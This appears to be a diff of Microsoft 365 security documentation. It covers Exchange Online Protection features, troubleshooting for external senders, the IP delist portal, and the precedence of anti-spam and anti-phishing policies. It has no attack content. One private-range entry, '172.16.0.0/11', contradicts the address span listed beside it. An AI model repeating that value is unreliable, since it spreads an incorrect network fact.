-|Accepted domains|[Manage accepted domains in Exchange Online](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)|
-|Connectors|[Configure mail flow using connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow)|
-|Enhanced Filtering for Connectors|[Enhanced filtering for connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors)|
-|**Monitoring**||
-|Message trace|[Message trace](message-trace-defender-portal.md) <p> [Message trace in the Exchange admin center](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac)|
-|Email & collaboration reports|[View email security reports](reports-email-security.md)|
-|Mail flow reports|[Mail flow reports in the Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
-|Mail flow insights|[Mail flow insights in the Exchange admin center](/exchange/monitoring/mail-flow-insights/mail-flow-insights)|
-|Auditing reports|[Auditing reports in the Exchange admin center](/exchange/security-and-compliance/exchange-auditing-reports/exchange-auditing-reports)|
-|**Service Level Agreements (SLAs) and support**||
-|Spam effectiveness SLA|\> 99%|
-|False positive ratio SLA|\< 1:250,000|
-|Virus detection and blocking SLA|100% of known viruses|
-|Monthly uptime SLA|99.999%|
-|Phone and web technical support 24 hours a day, seven days a week|[Get support for Microsoft 365 for business](/microsoft-365/admin/get-help-support).|
-|**Other features**||
-|A geo-redundant global network of servers|EOP runs on a worldwide network of datacenters that are designed to help provide the best availability. For more information, see the [EOP datacenters](#eop-datacenters) section earlier in this article.|
-|Message queuing when the on-premises server can't accept mail|Messages in deferral remain in our queues for one day. Message retry attempts are based on the error we get back from the recipient's mail system. On average, messages are retried every 5 minutes. For more information, see the [Mail flow delivery FAQ](mail-flow-about.md#mail-flow-delivery-faq).|
-|Office 365 Message Encryption available as an add-on|For more information, see [Encryption in Office 365](/purview/encryption).|
security External Senders Mail Flow Troubleshooting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/external-senders-mail-flow-troubleshooting.md
- Title: Troubleshooting mail sent to Microsoft 365
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier3
-
- - seo-marvel-apr2020
-description: This article provides troubleshooting information for issues with sending email to inboxes in Microsoft 365 & best practices for bulk mailing to Microsoft 365 customers.
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# External senders - Troubleshoot email sent to Microsoft 365
--
-This article provides troubleshooting information for senders who are experiencing issues when trying to send email to recipients in Microsoft 365, and best practices for bulk mailing to customers.
-
-## Are you managing your IP and domain's sending reputation?
-
-[Exchange Online Protection (EOP)](eop-about.md) provides anti-spam protection for Microsoft 365. We also use email authentication technologies like SPF, DKIM, and DMARC to verify that the domain sending the email is authorized to do so. Many factors influence EOP filtering. For example, the sending IP, domain, email authentication, list accuracy, complaint rates, content, and more. One of the principal factors in driving down a sender's reputation and their ability to deliver email is their junk email complaint rate.
-
-## Are you sending email from new IP addresses?
-
-IP addresses that have never been used to send email typically don't have any reputation in our systems. As a result, email from new sources are more likely to experience delivery issues. Once the IP address has built a reputation for not sending spam, EOP typically allows for a better email delivery experience.
-
-New IPs for domains with existing SPF records typically experience the added benefit of inheriting some of the domain's sending reputation. If your domain has a good sending reputation, new IPs might experience a faster ramp up time. A new IP can expect to be fully ramped within a couple of weeks or less depending on volume, list accuracy, and junk email complaint rates.
-
-## Confirm that your DNS is set up correctly
-
-For instructions about how to create and maintain DNS records, including the MX record required for mail routing, you need to contact your DNS hosting provider.
-
-## Ensure that you don't advertise yourself as a nonroutable IP
-
-We might not accept email from senders who fail a reverse-DNS lookup. In some cases, legitimate senders advertise themselves incorrectly as a non-internet routable IP when attempting to open a connection to EOP. IP addresses that are reserved for private (nonroutable) networking include:
--- 192.168.0.0/16 (or 192.168.0.0 - 192.168.255.255)-- 10.0.0.0/8 (or 10.0.0.0 - 10.255.255.255)-- 172.16.0.0/11 (or 172.16.0.0 - 172.31.255.255)-
-## You received a non-delivery report (NDR) when sending email to a user in Office 365
-
-Some delivery issues are the result of Microsoft blocking the sender's IP address, or the user account is identified as banned sender due to previous spam activity. If you believe that you received the non-delivery report (also known as an NDR or bounce message) in error, follow any instructions in the NDR message to resolve the issue.
-
-For more information about the error you received, see the list of error codes in [Email non-delivery reports in Exchange Online](/exchange/mail-flow-best-practices/non-delivery-reports-in-exchange-online/non-delivery-reports-in-exchange-online).
-
-For example, the following NDR indicates that Microsoft blocked the sending IP address:
-
-`550 5.7.606-649 Access denied, banned sending IP [x.x.x.x]; To request removal from this list please visit https://sender.office.com/ and follow the directions.`
-
-To request removal from this list, see [Use the delist portal to remove yourself from the blocked senders list](external-senders-use-the-delist-portal-to-unblock-yourself.md).
-
-## My email landed in the recipient's Junk Email folder
-
-If a message was incorrectly identified as spam by EOP, you can work with the recipient to submit this false positive message to Microsoft for analysis. For more information, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-## EOP throttled traffic from my IP address
-
-You receive the following NDR because suspicious activity was detected from the source IP address. Mail from the source has been temporarily restricted while it's being evaluated.
-
-`host xxxx.outlook.com [x.x.x.x]: 451 4.7.550 Access denied, please try again later`
-
-After we evaluate the messages and determine everything is OK, we remove the restriction.
-
-## I can't receive email from senders in Microsoft 365
-
-To receive messages from Microsoft 365 senders, make sure your network allows connections from the IP addresses that EOP uses in our datacenters. For more information, see [Exchange Online Protection IP addresses](/microsoft-365/enterprise/urls-and-ip-address-ranges).
-
-## Best practices for bulk emailing to Microsoft 365 users
-
-If you often conduct bulk email campaigns to Microsoft 365 users, follow the tips in this section.
-
-### Ensure that the From name reflects who is sending the message
-
-The Subject line of the message should be a brief summary of what the message is about. The message body should clearly and succinctly indicate what the offering, service, or product is about. For example:
-
-Correct:
-
-> From: marketing@shoppershandbag.com <br> Subject: Updated catalog for the Christmas season!
-
-Incorrect:
-
-> From: someone@outlook.com <br> Subject: Catalogs
-
-The easier you make it for people to know who you are and what you're doing, the less difficulty you have with most spam filters.
-
-### Always include an unsubscribe option in campaign emails
-
-Marketing email, especially newsletters, should always include a way to unsubscribe. For example:
-
-`This email was sent to example@contoso.com by sender@fabrikam.com.`
-
-`Update Profile/Email Address | Instant removal with SafeUnsubscribe&trade; | Privacy Policy`
-
-Requiring recipients to send email with "Unsubscribe" in the Subject line is less preferable than the one-click option. If you require recipients to send a message, ensure that the link takes them to a form where all required fields are populated.
-
-### Use the double opt-in option for marketing email or newsletter registration
-
-This industry best practice is recommended if your company requires or encourages users to register their contact information to access your product or services. The practice of automatically signing up users for marketing emails or e-newsletters during the registration process is questionable in today's internet environment.
-
-If the options to receive your newsletter or special offers are selected by default in your registration process, it's very likely that uninterested users will get your email.
-
-Microsoft recommends the double opt-in option, which means that the check box for marketing email or newsletters isn't selected by default. Additionally, once the registration form has been submitted, a verification email is sent to the user. The verification email contains a URL that allows the user to confirm their decision to receive marketing email.
-
-The double opt-in method helps to eliminate any questionable email marketing practices, because no one can claim that they unintentionally signed up for marketing email.
-
-### Ensure that email message content is transparent and traceable
-
-Email content is as important as the way you send email. Use the following best practices to ensure that your email isn't flagged by email filtering
--- Requests for recipients to add the sender to their address book should clearly state that this action doesn't guarantee of delivery.--- Redirects included in the body of the message should be similar and consistent, and not multiple and varied. A redirect in this context is anything that points away from the message, such as links and documents. If you have many advertising links, unsubscribe links, or update the profile links, they all should point to the same domain. For example:-
- Correct (all domains are the same):
-
- `unsubscribe.bulkmailer.com`
-
- `profile.bulkmailer.com`
-
- `options.bulkmailer.com`
-
- Incorrect (all domains are different):
-
- `unsubscribe.bulkmailer.com`
-
- `profile.excite.com`
-
- `options.yahoo.com`
--- Avoid content with large images and attachments, or messages that are composed entirely of an image.--- Your public privacy or P3P settings should clearly state the presence of tracking pixels (web bugs or beacons).-
-### Remove incorrect email aliases from your databases
-
-Any incorrect email addresses in your database that result in NDRs are unnecessary and put your outbound email at risk for further scrutiny by email filtering services. Ensure that your email database is up-to-date.
security External Senders Microsoft 365 Services https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/external-senders-microsoft-365-services.md
- Title: Services for external organizations sending mail to Microsoft 365
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: To help maintain user trust in the use of email, Microsoft has put in place various policies and technologies to help protect our users.
- Previously updated : 10/9/2023--
-# Microsoft 365 services for external email senders
-
-Email abuse, junk email, and fraudulent email (phishing) continue to burden internet email. To help maintain trust in the use of email, Microsoft uses several features to help protect our users. However, we understand the importance of not affecting legitimate email. Therefore, we have a suite of services to help external senders proactively manage their sender reputation and improve their ability to deliver email to Microsoft 365 users.
-
-This overview provides information about the benefits we provide to your organization, even if you aren't a Microsoft 365 customer.
-
-> [!TIP]
-> If you're not a Microsoft 365 customer, and you're trying to send email to Microsoft 365, this article is for you. If you're an admin in Microsoft 365 and you need help with fighting spam, this article isn't for you. Instead, see [anti-spam](anti-spam-protection-about.md) and [anti-malware](anti-malware-protection-about.md).
-
-## Microsoft support
-
-Microsoft offers several support options for people having trouble sending mail to Microsoft 365 recipients. We recommend that you:
--- Follow the instructions in any non-delivery report (also known as an NDR or bounce message) that you receive.-- Check out the most common problems that external senders encounter in [External senders - Troubleshoot email sent to Microsoft 365](external-senders-mail-flow-troubleshooting.md).-- Ask the Microsoft 365 recipient to contact Microsoft Support and open a support ticket on your behalf. Typically, external senders can't open support tickets in Microsoft 365. But, there are legal reasons that might require Microsoft Support to communicate directly with owner of the blocked source IP address space.-
- For more information about Microsoft Technical support for Microsoft 365, see [Support](/office365/servicedescriptions/office-365-platform-service-description/support).
-
-## Anti-Spam IP Delist Portal
-
-This self-service portal at <https://sender.office.com/> allows you to request your removal from the Microsoft 365 blocked senders list. Use the portal if you get errors sending messages to Microsoft 365 recipients. For more information, see [Use the delist portal to remove yourself from the blocked senders list](external-senders-use-the-delist-portal-to-unblock-yourself.md).
-
-## Abuse and spam reporting for junk email originating from Exchange Online
-
-Third parties occasionally violate our terms of use and use Microsoft 365 to send junk email. If you receive junk email from Microsoft 365 senders, you can report these messages to Microsoft. For instructions, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-## Legal stuff you need to know
-
-The following article explains how external organizations can avoid having their email blocked by adhering to our anti-spam rules, and contains legal stuff that you need to know: [External senders - Policies, practices, and guidelines](external-senders-policies-practices-guidelines.md).
security External Senders Policies Practices Guidelines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/external-senders-policies-practices-guidelines.md
- Title: Reference Policies, practices, and guidelines
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: Microsoft has developed various policies, procedures, and adopted several industry best practices to help protect our users from abusive, unwanted, or malicious email.
- Previously updated : 6/22/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Reference: Policies, practices, and guidelines
--
-Microsoft is dedicated to helping provide the most trusted user experience on the web. Therefore, Microsoft has developed various policies, procedures, and adopted several industry best practices to help protect our users from abusive, unwanted, or malicious email. Senders attempting to send email to users should ensure they fully understand and are following the guidance in this article to help in this effort and to help avoid potential delivery issues.
-
-If you aren't in compliance with these policies and guidelines, it may not be possible for our support team to assist you. If you're adhering to the guidelines, practices, and policies presented in this article and are still experiencing delivery issues based on your sending IP address, follow the steps to submit a delisting request. For instructions, see [Use the delist portal to remove yourself from the blocked senders list](external-senders-use-the-delist-portal-to-unblock-yourself.md).
-
-## General Microsoft policies
-
-Email sent to Microsoft 365 users must comply with all Microsoft policies governing email transmission and use of Microsoft 365.
--- Terms of Services applicable to Microsoft 365; in particular, the prohibition against using the service to spam or distribute malware.-- [Microsoft Services Agreement](https://www.microsoft.com/servicesagreement/)-
-## Governmental regulations
-
-Email sent to Microsoft 365 users must adhere to all applicable laws and regulations governing email communications in the applicable jurisdiction.
--- [CAN-SPAM Act: A Compliance Guide for Business](https://www.ftc.gov/business-guidance/resources/can-spam-act-compliance-guide-business)-- ["Remove Me" Responses and Responsibilities: Email Marketers Must Honor "Unsubscribe" Claims](https://www.lawpublish.com/ftc-emai-marketers-unsubscribe-claims.html)-
-## Technical guidelines
-
-Email sent to Microsoft 365 should comply with the applicable recommendations listed in the following documents (some links are only available in English).
--- [RFC 2505: Anti-Spam Recommendations for SMTP MTAs](https://www.ietf.org/rfc/rfc2505.txt)-- [RFC 2920: SMTP Service Extension for Command Pipelining](https://www.ietf.org/rfc/rfc2920.txt)-
-In addition, email servers connecting to Microsoft 365 must adhere to the following requirements:
--- The sender is expected to comply with all technical standards for the transmission of Internet email, as published by The Internet Society's Internet Engineering Task Force (IETF), including RFC 5321, RFC 5322, and others.-- After given a numeric SMTP error response code between 500 and 599 (also known as a permanent non-delivery response or NDR), the sender must not attempt to retransmit that message to that recipient.-- After multiple non-delivery responses, the sender must cease further attempts to send email to that recipient.-- Messages must not be transmitted through insecure email relay or proxy servers.-- The mechanism for unsubscribing, either from individual lists or all lists hosted by the sender, must be clearly documented and easy for recipients to find and use.-- Connections from dynamic IP addresses might not be accepted.-- Email servers must have valid reverse DNS records.-
-## Reputation management
-
-Senders, ISP's, and other service providers should actively manage the reputation of your outbound IP addresses.
-
-## Microsoft 365 limits
-
-Senders must adhere to Microsoft 365 limits listed in [Exchange Online Protection Limits](/office365/servicedescriptions/exchange-online-protection-service-description/exchange-online-protection-limits).
-
-## Email delivery resources and organizations
-
-Microsoft actively works with industry bodies and service providers in order to improve the internet and email ecosystem. These organizations have published best practice documents that we support and recommend senders adhere to. Adhering to these recommendations improves your ability to deliver email among several email service providers around the world.
--- [Messaging Malware Mobile Anti-Abuse Working Group](https://www.m3aawg.org/)-- [Online Trust Alliance](https://www.internetsociety.org/ota/)-- [Email Sender & Provider Coalition](https://www.espcoalition.org/)-
-## Abuse and spam reporting
-
-To report unlawful, abusive, unwanted or malicious email, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md). Sending these types of communications is a violation of Microsoft policy, and appropriate action is taken on confirmed reports.
-
-## Law enforcement
-
-If you're a member of law enforcement and wish to serve Microsoft Corporation with legal documentation regarding Microsoft 365, or if you have questions regarding legal documentation that you submitted to Microsoft, call +1 (425) 722-1299.
security External Senders Use The Delist Portal To Unblock Yourself https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/external-senders-use-the-delist-portal-to-unblock-yourself.md
- Title: Remove yourself from the blocked senders list and address 5.7.511 Access denied errors
- - NOCSH
--- Previously updated : 6/20/2023--
- - MET150
-
- - m365-security
- - tier3
-
- - seo-marvel-apr2020
-description: In this article, you learn how to use the delist portal to remove yourself from the Microsoft 365 blocked senders list. This action is the best response to address 5.7.511 Access denied errors.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# External senders - Use the delist portal to remove yourself from the blocked senders list and address 5.7.511 Access denied errors
-
-Are you getting an error message when you try to send an email to a recipient whose email address is in Microsoft 365 (for example and address 5.7.511 Access denied)? If you think you shouldn't be receiving the error message, you can use the delist portal to remove yourself from the blocked senders list.
-
-## What is the blocked senders list?
-
-Microsoft uses the blocked senders list to protect its customers from spam, spoofing, and phishing attacks. Your mail server's IP address, that is, the address your mail server uses to identify itself on the Internet, was tagged as a potential threat to Microsoft 365 for one of various reasons. When Microsoft 365 adds the IP address to the list, it prevents all further communication between the IP address and any of our customers through our datacenters.
-
-You know that you're on the list when you receive a non-delivery report (also known as an NDR or bounce message) that looks like this:
-
-> 550 5.7.606-649 Access denied, banned sending IP [_IP address_] (ex. 5.7.511 Access denied): To request removal from this list please visit <https://sender.office.com/> and follow the directions. For more information, see [Email non-delivery reports in Exchange Online](/Exchange/mail-flow-best-practices/non-delivery-reports-in-exchange-online/non-delivery-reports-in-exchange-online).
-
-Where _IP address_ is the IP address of the computer on which the mail server runs.
-
-## Verify senders before removing them from the blocked senders list
-
-There are good reasons for senders to wind up on the blocked senders list, but mistakes can happen. Take a look at this video for a balanced explanation of blocked senders and delisting.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMhvD]
-
-## Use the delist portal to remove yourself from the blocked senders list (after errors like 5.7.511 Access denied)
-
-1. Go to <https://sender.office.com>.
-
-2. On the **Office 365 Anti-Spam IP Delist Portal** page, Follow the instructions. Use the email address where the error message was sent, and the IP address that was specified in the error message. You can enter only one email address and one IP address per visit.
-
-3. When you're finished on the page, select **Submit**.
-
-4. A message that looks like the following example is sent to the email address that you entered on the **Office 365 Anti-Spam IP Delist Portal** page.
-
- :::image type="content" source="../../media/bf13e4f7-f68c-4e46-baa7-b6ab4cfc13f3.png" alt-text="The email received when you submit a request through the delist portal" lightbox="../../media/bf13e4f7-f68c-4e46-baa7-b6ab4cfc13f3.png":::
-
- Select the confirmation link in the email message to open the delist portal.
-
-5. In the delist portal, select **Delist IP**.
-
- After the IP address is removed from the blocked senders list, email messages from that IP address will be delivered to recipients who use Microsoft 365. Verify that email sent from that IP address isn't abusive or malicious. Otherwise, the IP address might be blocked again.
-
- > [!NOTE]
- > It may take up to 24 hours or results can vary widely before restrictions are removed.
-
-To prevent an IP address from being blocked, see [Create safe sender lists in Exchange Online Protection](create-safe-sender-lists-in-office-365.md) and [Outbound spam protection in Exchange Online Protection](outbound-spam-protection-about.md) .
-
-### How to fix error code 5.7.511
-
-When there's a problem delivering an email message that you sent, Microsoft 365 or Office 365 sends an email notification to let you know. The email notification is known a delivery status notification or DSN. The most common type of DSN is a non-delivery report (also known as an NDR or bounce message) that tells you that a message wasn't delivered. In certain situations, Microsoft must conduct other investigations against traffic from your IP address. If you receive and NDR with code 5.7.511, you **will not** be able to use the delist portal.
-
-> 550 5.7.511 Access denied, banned sender[xxx.xxx.xxx.xxx]. To request removal from this list, forward this message to delist@microsoft.com. For more information, go to https://go.microsoft.com/fwlink/?LinkId=526653.
-
-In the email to request removal from this list, provide the full NDR code and IP address. Microsoft will contact you within 48 hours with the next steps.
-
-## More information
-
-The delisting form for **Outlook.com, the consumer service** can be found [here](https://support.microsoft.com/supportrequestform/8ad563e3-288e-2a61-8122-3ba03d6b8d75). Be sure to read the [FAQ](https://sendersupport.olc.protection.outlook.com/pm/troubleshooting.aspx) first for _submission_ direction.
security How Policies And Protections Are Combined https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/how-policies-and-protections-are-combined.md
- Title: Order and precedence of email protection
-keywords: security, malware, Microsoft 365, M365, security center, Microsoft Defender portal, Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity
- - NOCSH
-----
- - m365-security
- - tier3
-
- - seo-marvel-apr2020
-description: Admins can learn how the order of protection settings and the priority order of security policies affect the application of security policies in Microsoft 365.
- Previously updated : 10/20/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Order and precedence of email protection
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, inbound email might be flagged by multiple forms of protection. For example, anti-spoofing protection that's available to all Microsoft 365 customers, and impersonation protection that's available to Microsoft Defender for Office 365 customers only. Messages also pass through multiple detection scans for malware, spam, phishing, etc. Given all this activity, there might be some confusion as to which policy is applied.
-
-In general, a policy that's applied to a message is identified in the **X-Forefront-Antispam-Report** header in the **CAT (Category)** property. For more information, see [Anti-spam message headers](message-headers-eop-mdo.md).
-
-There are two major factors that determine which policy is applied to a message:
--- **The order of processing for the email protection type**: This order isn't configurable, and is described in the following table:-
- |Order|Email protection|Category|Where to manage|
- |::||||
- |1|Malware|`CAT:MALW`|[Configure anti-malware policies in EOP](anti-malware-policies-configure.md)|
- |2|High confidence phishing|`CAT:HPHSH`|[Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
- |3|Phishing|`CAT:PHSH`|[Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
- |4|High confidence spam|`CAT:HSPM`|[Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
- |5|Spoofing|`CAT:SPOOF`|[Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md)|
- |6<sup>\*</sup>|User impersonation (protected users)|`CAT:UIMP`|[Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)|
- |7<sup>\*</sup>|Domain impersonation (protected domains)|`CAT:DIMP`|[Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)|
- |8<sup>\*</sup>|Mailbox intelligence (contact graph)|`CAT:GIMP`|[Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)|
- |9|Spam|`CAT:SPM`|[Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
- |10|Bulk|`CAT:BULK`|[Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
-
- <sup>\*</sup> These features are available only in anti-phishing policies in Microsoft Defender for Office 365.
--- **The priority order of policies**: The policy priority order is shown in the following list:-
- 1. The anti-spam, anti-malware, anti-phishing, Safe Links<sup>\*</sup>, and Safe Attachments<sup>\*</sup> policies in the [Strict preset security policy](preset-security-policies.md#profiles-in-preset-security-policies) (when enabled).
- 2. The anti-spam, anti-malware, anti-phishing, Safe Links<sup>\*</sup>, and Safe Attachments<sup>\*</sup> policies in the [Standard preset security policy](preset-security-policies.md#profiles-in-preset-security-policies) (when enabled).
- 3. Anti-phishing, Safe Links, and Safe Attachments in [Defender for Office 365 evaluation policies](try-microsoft-defender-for-office-365.md#audit-mode-vs-blocking-mode-for-defender-for-office-365) (when enabled).
- 4. Custom anti-spam, anti-malware, anti-phishing, Safe Links<sup>\*</sup>, and Safe Attachments<sup>\*</sup> policies (when created).
-
- Custom policies are assigned a default priority value when you create the policy (newer equals higher), but you can change the priority value at any time. This priority value affects the order that *custom policies* of that type (anti-spam, anti-malware, anti-phishing, etc.) are applied, but doesn't affect where custom policies are applied in the overall order.
-
- 5. Of equal value:
- - The Safe Links and Safe Attachments policies in the [Built-in protection preset security policy](preset-security-policies.md#profiles-in-preset-security-policies)<sup>\*</sup>.
- - The default policies for anti-malware, anti-spam, and anti-phishing.
-
- You can configure exceptions to the Built-in protection preset security policy, but you can't configure exceptions to the default policies (they apply to all recipients and you can't turn them off).
-
- <sup>\*</sup> Defender for Office 365 only.
-
- The priority order matters if you have the same recipient intentionally or unintentionally included in multiple policies, because *only* the first policy of that type (anti-spam, anti-malware, anti-phishing, etc.) is applied to that recipient, regardless of how many other policies that the recipient is included in. There's never a merging or combining of the settings in multiple policies for the recipient. The recipient is unaffected by the settings of the remaining policies of that type.
-
-For example, the group named "Contoso Executives" is included in the following policies:
--- The Strict preset security policy-- A custom anti-spam policy with the priority value 0 (highest priority)-- A custom anti-spam policy with the priority value 1.-
-Which anti-spam policy settings are applied to the members of Contoso Executives? The Strict preset security policy. The settings in the custom anti-spam policies are ignored for the members of Contoso Executives, because the Strict preset security policy is always applied first.
-
-As another example, consider the following custom anti-phishing policies in Microsoft Defender for Office 365 that apply to the same recipients, and a message that contains both user impersonation and spoofing:
-
-|Policy name|Priority|User impersonation|Anti-spoofing|
-||::|::|::|
-|Policy A|1|On|Off|
-|Policy B|2|Off|On|
-
-1. The message is identified as spoofing, because spoofing (5) is evaluated before user impersonation (6) in the order of processing for the email protection type.
-2. Policy A is applied first, because it has a higher priority than Policy B.
-3. Based on the settings in Policy A, no action is taken on the message because anti-spoofing is turned off.
-4. The processing of anti-phishing policies stops for all included recipients, so Policy B is never applied to recipients who are also in Policy A.
-
-To make sure that recipients get the protection settings that you want, use the following guidelines for policy memberships:
--- Assign a smaller number of users to higher priority policies, and a larger number of users to lower priority policies. Remember, default policies are always applied last.-- Configure higher priority policies to have stricter or more specialized settings than lower priority policies. You have complete control over the settings in custom policies and the default policies, but no control over most settings in preset security policies.-- Consider using fewer custom policies (only use custom policies for users who require more specialized settings than the Standard or Strict preset security policies, or the default policies).-
-## Appendix
-
-It's important to understand how user allows and blocks, tenant allows and blocks, and filtering stack verdicts in EOP and Defender for Office 365 complement or contradict each other.
--- For information about filtering stacks and how they're combined, see [Step-by-step threat protection in Microsoft Defender for Office 365](protection-stack-microsoft-defender-for-office365.md).-- After the filtering stack determines a verdict, only then are tenant policies and their configured actions evaluated.-- If the same email address or domain exists in a user's Safe Senders list and Blocked Senders list, the Safe Senders list takes precedence.-- If the same entity (email address, domain, spoofed sending infrastructure, file, or URL) exists in an allow entry and a block entry in the Tenant Allow/Block List, the block entry takes precedence.-
-### User allows and blocks
-
-Entries in a user's _safelist collection_ (the Safe Senders list, the Safe Recipients list, and the Blocked Senders list on each mailbox) are able to override some filtering stack verdicts as described in the following table:
-
-|Filtering stack verdict|User's Safe Senders/Recipients list|User's Blocked Senders list|
-||||
-|Malware|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
-|High confidence phishing|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
-|Phishing|**User wins**: Email delivered to user's Inbox|**Tenant wins**: The applicable anti-spam policy determines the action|
-|High confidence spam|**User wins**: Email delivered to user's Inbox|**User wins**: Email delivered to user's Junk Email folder|
-|Spam|**User wins**: Email delivered to user's Inbox|**User wins**: Email delivered to user's Junk Email folder|
-|Bulk|**User wins**: Email delivered to user's Inbox|**User wins**: Email delivered to user's Junk Email folder|
-|Not spam|**User wins**: Email delivered to user's Inbox|**User wins**: Email delivered to user's Junk Email folder|
-
-For more information about the safelist collection and anti-spam settings on user mailboxes, see [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md).
-
-### Tenant allows and blocks
-
-Tenant allows and blocks are able to override some filtering stack verdicts as described in the following tables:
--- [Advanced delivery policy](advanced-delivery-policy-configure.md) (skip filtering for designated SecOps mailboxes and phishing simulation URLs):-
- |Filtering stack verdict|Advanced delivery policy allow|
- |||
- |Malware|**Tenant wins**: Email delivered to mailbox|
- |High confidence phishing|**Tenant wins**: Email delivered to mailbox|
- |Phishing|**Tenant wins**: Email delivered to mailbox|
- |High confidence spam|**Tenant wins**: Email delivered to mailbox|
- |Spam|**Tenant wins**: Email delivered to mailbox|
- |Bulk|**Tenant wins**: Email delivered to mailbox|
- |Not spam|**Tenant wins**: Email delivered to mailbox|
--- [Exchange mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules):-
- |Filtering stack verdict|Mail flow rule allows<sup>\*</sup>|Mail flow rule blocks|
- ||||
- |Malware|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
- |High confidence phishing|**Filter wins**: Email quarantined except in complex routing|**Filter wins**: Email quarantined|
- |Phishing|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Phishing action in the applicable anti-spam policy|
- |High confidence spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Bulk|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Not spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
-
- <sup>\*</sup> Organizations that use a third-party security service or device in front of Microsoft 365 should consider using [Authenticated Received Chain (ARC)](email-authentication-arc-configure.md) (contact the third-party for availability) and [Enhanced Filtering for Connectors (also known as skip listing)](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) instead of an SCL=-1 mail flow rule. These improved methods reduce email authentication issues and encourage [defense-in-depth](step-by-step-guides/defense-in-depth-guide.md) email security.
--- IP Allow List and IP Block List in [connection filter policies](connection-filter-policies-configure.md):-
- |Filtering stack verdict|IP Allow List|IP Block List|
- ||||
- |Malware|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
- |High confidence phishing|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
- |Phishing|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email silently dropped|
- |High confidence spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email silently dropped|
- |Spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email silently dropped|
- |Bulk|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email silently dropped|
